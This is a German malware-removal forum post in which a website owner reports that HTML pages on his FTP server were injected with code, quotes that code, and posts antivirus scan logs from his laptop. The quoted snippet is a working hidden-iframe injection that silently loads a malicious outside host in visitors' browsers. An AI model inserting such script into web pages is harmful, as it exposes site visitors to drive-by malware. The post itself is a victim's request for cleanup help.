Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung
Malware-Code "online-alles.net" in HTML-Seiten - Trojaner? --- Teil 2: Laptop

Malware-Code "online-alles.net" in HTML-Seiten - Trojaner? --- Teil 2: Laptop


Plagegeister aller Art und deren Bekämpfung: Malware-Code "online-alles.net" in HTML-Seiten - Trojaner? --- Teil 2: Laptop

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

 
Vorheriger Beitrag Vorheriger Beitrag   Nächster Beitrag Nächster Beitrag
Alt 20.08.2012, 14:05   #1
scherli
 
Malware-Code "online-alles.net" in HTML-Seiten - Trojaner? --- Teil 2: Laptop - Standard

Malware-Code "online-alles.net" in HTML-Seiten - Trojaner? --- Teil 2: Laptop


So, ich poste jetzt nochmal aus dem alten Thema die Logs der beiden Rechner in jeweils eigenem Thread, damit niemand mit den Logs durcheinanderkommt.

Bevor ich hier zum Einstieg auch nochmal die Original-Problembeschreibung reinkopiere, möchte ich noch kurz die Vermutung äußern, dass das Ganze mit dem FTP-Client FlashFXP zu tun hat, von dem ich vor ein paar Jahren die Lizenz gekauft habe. Es scheinen nur Server betriffen zu sein, deren FTP-Daten dort gespeichert sind - nicht aber die, die ich in FireFTP im Firefox verwalte.

ORIGINAL-PROBLEMBESCHREIBUNG aus dem Thread http://www.trojaner-board.de/121065-...-trojaner.html

Code:
ATTFilter
Hallo zusammen,

ich sitze gerade ziemlich ratlos vor dem Rechner und erhoffe mir hier eine "Erleuchtung".

In einigen Webseiten - ausschließlich HTML-Dateien - auf die ich per FTP zugreife, hat sich der nachfolgende Code eingeschlichen, wegen dem zum einen Google Adwords die entsprechenden Kampagnen blockt und zum anderen Kunden Warnungen bekommen, dass die Seiten schädlich sind:

<body><!--c3284d--><script>var url="hxxp://online-alles.net";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibili ty: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script><!--/c3284d-->

Leider bin ich beim Googeln nicht weiter gekommen, denn die Verlinkung zu online-alles.net als Malware wird kaum thematisiert.

Auf Nachfrage beim Support des Providers HostEurope wurde ich darauf verwiesen, dass ich vermutlich einen Trojaner auf dem Rechner habe, der die FTP-Passwörter ausspioniert und es ermöglicht hat, dass der oben gepostete Code am 17.6.2012 in die HTML-Dateien eingefügt wurde. Als FTP-Client nutze ich hauptsächlich FlashFXP, zum anderen aber auch den Client von Firefox.

Ich habe mich hier am Board etwas umgeschaut und habe nun mit Malwarebytes sowohl den Laptop als auch den Bürorechner auf Trojaner gecheckt und wurde auch fündig. Nachfolgend poste ich die beiden Logfiles und hoffe, dass mir jemand sagen kann, was ich mir da eingefangen hatte und ob einer dieser Trojaner die Passwörter abgefangen haben könnte. Oder habe ich womöglch noch etwas auf dem Rechner, was Malwarebytes nicht gefunden hat?

Ich hatte zuvor schon, bevor ich auf dieses Forum gestoßen bin, mit TrojanHunter mein System gecheckt. Damit wurden angebliche Trojaner in alten Download-Dateien aus den Jahren 2007-2009 gefunden, die ich daraufhin gelöscht habe. Glaube aber nicht, dass sich die Auslöser drunter befunden haben.

Es wäre toll, wenn mir hier jemand hilfreich unter die Arme greifen könnte.

Schritt 1 - Malwarebytes Quick Scan:

Code:
ATTFilter
Malwarebytes Anti-Malware 1.62.0.1300
www.malwarebytes.org

Datenbank Version: v2012.08.02.07

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 9.0.8112.16421
Max Mustermann: XXXX-LAPTOP2011 [Administrator]

02.08.2012 16:20:52
mbam-log-2012-08-02 (16-20-52).txt

Art des Suchlaufs: Quick-Scan
Aktivierte Suchlaufeinstellungen: Speicher | Autostart | Registrierung | Dateisystem | Heuristiks/Extra | HeuristiKs/Shuriken | PUP | PUM
Deaktivierte Suchlaufeinstellungen: P2P
Durchsuchte Objekte: 219066
Laufzeit: 3 Minute(n), 33 Sekunde(n)

Infizierte Speicherprozesse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule: 0
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel: 13
HKCR\CLSID\{78F3A323-798E-4AEA-9A57-88F4B05FD5DD} (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKCR\TypeLib\{BB7256DD-EBA9-480B-8441-A00388C2BEC3} (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKCR\Interface\{3D782BB2-F2A5-11D3-BF4C-000000000000} (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKCR\MyNewsBarLauncher.IE5BarLauncherBHO.1 (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKCR\MyNewsBarLauncher.IE5BarLauncherBHO (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{78F3A323-798E-4AEA-9A57-88F4B05FD5DD} (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{78F3A323-798E-4AEA-9A57-88F4B05FD5DD} (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{78F3A323-798E-4AEA-9A57-88F4B05FD5DD} (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKCR\CLSID\{7AC3E13B-3BCA-4158-B330-F66DBB03C1B5} (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKCR\MyNewsBarLauncher.IE5BarLauncher.1 (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKCR\MyNewsBarLauncher.IE5BarLauncher (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{7AC3E13B-3BCA-4158-B330-F66DBB03C1B5} (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{7AC3E13B-3BCA-4158-B330-F66DBB03C1B5} (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.

Infizierte Registrierungswerte: 2
HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar|{7AC3E13B-3BCA-4158-B330-F66DBB03C1B5} (PUP.VShareRedir) -> Daten: StartSearchTB -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\{7AC3E13B-3BCA-4158-B330-F66DBB03C1B5} (PUP.VShareRedir) -> Daten: -> Erfolgreich gelöscht und in Quarantäne gestellt.

Infizierte Dateiobjekte der Registrierung: 1
HKLM\SOFTWARE\Microsoft\Internet Explorer\Main|Start Page (Hijack.StartPage) -> Bösartig: (hxxp://startsear.ch/) Gut: (hxxp://www.google.com) -> Erfolgreich ersetzt und in Quarantäne gestellt.

Infizierte Verzeichnisse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Dateien: 1
C:\Program Files (x86)\vShare.tv plugin\ssBarLcher.dll (PUP.VShareRedir) -> Erfolgreich gelöscht und in Quarantäne gestellt.

(Ende)

Schritt 2 - ESET Komplettscan:

Code:
ATTFilter
ESETSmartInstaller@High as CAB hook log:
OnlineScanner64.ocx - registred OK
OnlineScanner.ocx - registred OK
# version=7
# iexplore.exe=9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
# OnlineScanner.ocx=1.0.0.6583
# api_version=3.0.2
# EOSSerial=aa000209be1d4b4287ef01bc140b1923
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2012-08-08 01:12:48
# local_time=2012-08-08 03:12:48 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# lang=1031
# osver=6.1.7601 NT Service Pack 1
# compatibility_mode=2304 16777215 100 0 0 0 0 0
# compatibility_mode=5893 16776574 100 94 40584951 96053126 0 0
# compatibility_mode=8192 67108863 100 0 186 186 0 0
# scanned=336999
# found=7
# cleaned=0
# scan_time=8292
C:\ProgramData\Tarma Installer\{889DF117-14D1-44EE-9F31-C5FB5D47F68B}\_Setupx.dll	Win32/Adware.Yontoo.B Anwendung (Säubern nicht möglich)	00000000000000000000000000000000	I
C:\Users\All Users\Tarma Installer\{889DF117-14D1-44EE-9F31-C5FB5D47F68B}\_Setupx.dll	Win32/Adware.Yontoo.B Anwendung (Säubern nicht möglich)	00000000000000000000000000000000	I
C:\Users\Max Mustermann\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3SK0CX2Y\SoftonicDownloader_fuer_panda-cloud-antivirus.exe	Variante von Win32/SoftonicDownloader.D Anwendung (Säubern nicht möglich)	00000000000000000000000000000000	I
C:\Users\Max Mustermann\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\A33CGYX5\watch-stuttgart-vs-monchengladbach[1].htm	JS/TrojanDownloader.Iframe.NKE Trojaner (Säubern nicht möglich)	00000000000000000000000000000000	I
C:\Users\Max Mustermann\AppData\Local\Temp\ezLooker-S-Setup_Suite1.exe	möglicherweise Variante von Win32/Adware.FCVRETQ Anwendung (Säubern nicht möglich)	00000000000000000000000000000000	I
C:\Users\Max Mustermann\AppData\Local\Temp\jar_cache7501308251212810741.tmp	Variante von Java/Exploit.CVE-2012-0507.DD Trojaner (Säubern nicht möglich)	00000000000000000000000000000000	I
C:\Users\Max Mustermann\AppData\Local\Temp\YontooSetup-S.exe	Win32/Adware.Yontoo Anwendung (Säubern nicht möglich)	00000000000000000000000000000000	I

Schritt 3 - Malwarebytes Komplettscan:

Code:
ATTFilter
Malwarebytes Anti-Malware 1.62.0.1300
www.malwarebytes.org

Datenbank Version: v2012.08.13.01

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 9.0.8112.16421
Max Mustermann :: MAX-LAPTOP2011 [Administrator]

13.08.2012 10:14:34
mbam-log-2012-08-13 (10-14-34).txt

Art des Suchlaufs: Vollständiger Suchlauf (C:\|)
Aktivierte Suchlaufeinstellungen: Speicher | Autostart | Registrierung | Dateisystem | Heuristiks/Extra | HeuristiKs/Shuriken | PUP | PUM
Deaktivierte Suchlaufeinstellungen: P2P
Durchsuchte Objekte: 534432
Laufzeit: 1 Stunde(n), 32 Minute(n), 32 Sekunde(n)

Infizierte Speicherprozesse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule: 0
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel: 0
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungswerte: 0
(Keine bösartigen Objekte gefunden)

Infizierte Dateiobjekte der Registrierung: 0
(Keine bösartigen Objekte gefunden)

Infizierte Verzeichnisse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Dateien: 1
C:\Users\Max Mustermann\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3SK0CX2Y\SoftonicDownloader_fuer_panda-cloud-antivirus.exe (PUP.ToolbarDownloader) -> Erfolgreich gelöscht und in Quarantäne gestellt.

(Ende)

Heute morgen wurde mit eine Hardcopy einer Microsoft Security Essentials Warnmeldung weitergeleitet, die bei einer der immer noch Malware-versuchten Seiten angeschlagen hat. Dort wurde ein Trojan:JS/Iframe.BT erkannt. Vielleicht bringt uns das weiter?

Danke in jedem Fall schon mal für die Unterstützung!

 

Themen zu Malware-Code "online-alles.net" in HTML-Seiten - Trojaner? --- Teil 2: Laptop
administrator, ausspioniert, autostart, browser, escan, explorer, firefox, gelöscht, google, helper, hilfreich, hook, iexplore.exe, java/exploit.cve-2012-0507.dd, kunde, laptop, lizenz, logfiles, malwarebytes, microsoft, nicht möglich, ratlos, scan, security, server, software, startsearch, system, tarma, trojan:js/iframe.bt, trojaner, trojaner?


« MyStart by IncrediBar im neuen Tab | Notebook komplett verseucht »


Ähnliche Themen: Malware-Code "online-alles.net" in HTML-Seiten - Trojaner? --- Teil 2: Laptop


  1. unberechtigte Zugriffe von Unbekannt auf Online-Konten bei Versandhändlern; Verdacht auf "Ausspäh-Virus" auf Computer - Teil I-
    Plagegeister aller Art und deren Bekämpfung - 28.07.2015 (18)
  2. Windows7: Seiten springen auf Werbung um, Seiten nich zu öffnen oder schließen "Tr.Drop.Rotbrow.K.1 " und 8 weitere Viren in Quarantäne"
    Log-Analyse und Auswertung - 21.03.2015 (9)
  3. Diverse Malware ("CoolSaleCoupon", "ddownlloaditkeep", "omiga-plus", "SaveSense", "SaleItCoupon"); lahmer PC & viel Werbung!
    Plagegeister aller Art und deren Bekämpfung - 11.01.2015 (16)
  4. netwars Teil 5: "Die Industrie der Angst" auf heise online
    Nachrichten - 27.04.2014 (0)
  5. Entfernung >Schadcode: >c3284d....online-alles.net....< aus HTML Seiten
    Plagegeister aller Art und deren Bekämpfung - 25.11.2012 (5)
  6. Malware-Code "online-alles.net" in HTML-Seiten - Trojaner? --- Teil 1: Bürorechner
    Plagegeister aller Art und deren Bekämpfung - 26.08.2012 (8)
  7. Malware-Code "online-alles.net" in HTML-Seiten - Trojaner?
    Plagegeister aller Art und deren Bekämpfung - 20.08.2012 (6)
  8. Links auf Antiviren Seiten werden mit Google 404 abgefangen, Online Banking Daten "gestohlen"
    Plagegeister aller Art und deren Bekämpfung - 04.07.2012 (2)
  9. "HEUR/HTML.Malware"-Fund von AVIRA
    Plagegeister aller Art und deren Bekämpfung - 21.04.2011 (12)
  10. Wie soll ich "HTML/Rce.gen" in "\Firefox\Profiles\p2hadvdz.default\Cache" entfernen?
    Plagegeister aller Art und deren Bekämpfung - 06.02.2011 (1)
  11. MBR reparieren, da mbr.exe "malicious code" und "copy of MBR" meldet
    Plagegeister aller Art und deren Bekämpfung - 28.11.2010 (24)
  12. Im Web "HTML/Crypted.Gen" gefunden -> gelöscht -> alles hinüber
    Log-Analyse und Auswertung - 07.12.2009 (2)
  13. "error cleaner" "privacy protector" "spyware&malware protection"
    Plagegeister aller Art und deren Bekämpfung - 28.06.2008 (7)
  14. "error cleaner" "privacy protector" "spyware und malware protection"
    Plagegeister aller Art und deren Bekämpfung - 28.06.2008 (2)
  15. "gutmütiger" Trojaner - online in "befreundeten" pc einloggen
    Alles rund um Windows - 19.10.2007 (5)
  16. ">"">><meta http-equiv="Refresh" content="0;url=http://askimizsonsuza.com/code/">"">
    Plagegeister aller Art und deren Bekämpfung - 04.09.2006 (4)
Anleitungen und Tipps

- Für alle Hilfesuchenden! Was beachten?

- Anleitung: MyStartSearch.com entfernen

- Anleitung: WebSearches löschen

- Hilfe: iStartSurf entfernen – so gehts!

- Anleitung: Omiga Plus richtig entfernen

- Browser Viren entfernen


Zum Thema Malware-Code "online-alles.net" in HTML-Seiten - Trojaner? --- Teil 2: Laptop - So, ich poste jetzt nochmal aus dem alten Thema die Logs der beiden Rechner in jeweils eigenem Thread, damit niemand mit den Logs durcheinanderkommt. Bevor ich hier zum Einstieg auch - Malware-Code "online-alles.net" in HTML-Seiten - Trojaner? --- Teil 2: Laptop...
Archiv
Du betrachtest: Malware-Code "online-alles.net" in HTML-Seiten - Trojaner? --- Teil 2: Laptop auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131